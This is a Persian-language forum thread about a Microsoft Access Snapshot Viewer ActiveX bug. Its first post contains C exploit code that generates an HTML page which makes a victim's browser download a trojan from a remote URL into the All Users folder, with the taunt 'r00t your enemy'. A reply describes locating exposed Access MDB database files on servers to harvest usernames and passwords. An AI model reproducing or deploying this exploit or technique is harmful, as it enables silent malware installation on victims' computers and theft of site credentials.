باگ خطرناک در ACCESS

[Alux]

یه باگ خطرناک امروز دیدم واسه اکسل اومده

که با کابر اجازه می ده یه تروجان در سرور آپلود کنه

باگ بصورت ریموت هست

اینم کد

کد:

/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
   Ms-Access SnapShot Exploit Snapview.ocx v 10.0.5529.0
   Download nice binaries into an arbitrary box
   Vulnerability discovered by Oliver Lavery 
   http://www.securityfocus.com/bid/8536/info
   Remote: Yes
   greetz to str0ke */

#include <stdio.h>
#include <stdlib.h>


#define Filename        "Ms-Access-SnapShot.html"


FILE *File;
char data[] = "<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attack'></object>\n"
              "<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n"
              "var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"
              "attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
              "<script>\n<html>";

int main ()
{
        printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");
        printf("**c0ded by callAX**\n");
        printf("**r00t your enemy .| **");

        char *b0fer;

        if ( (File = fopen(Filename,"w")) == NULL ) {
                printf("\n fopen() error");
                exit(1);
        }

        b0fer = (char*)malloc(strlen(data));

        fwrite(data, strlen(data), 1,File);
        fclose(File);

        printf("\n\n" Filename " has been created.\n");
        return 0;
}

---

موضوعات مشابه:

• چرا گزینه control access through Remote Access Policy غیر فعاله؟
• خطای No Internet access هنگام شیر کردن اینترنت به وسیله access point در win7
• معنی این نوشته ها در فایل access.log اسکوئید چیه؟
• access for everyone
• مشکل انتقال از Access به SQL

---

[webgard3]

یعنی آپلود کنه روی سروری که روش اکسل نصبه؟

[Alux]

آره ، خوراک NTTAC

[herus_deus]

البته اكسس منظوره نظر بوده.

[Alux]

اشتباه لپی بود !!!

[shast]

access باگ زیاد داده ... الان شما اگه یک سروری که دیتابسش از اکسس باشه کار براش از اکسس استفاده کنن ( که نیست دیگه خیلی قدیمیه ) شما با یه برنامه ای مثل Intellitamper می تونین فایل MDB رو پیدا کنین و دل کنین که یوزر پس توش هستش .. مثلا پورتال های News دوسال پیش یادامه خیلی اینجوری هک می شدن ..... اینم باگ جالبی بود ممنونم از دوسته خوبمون آقا علی رضا بابت اطلاع رسانیه عالی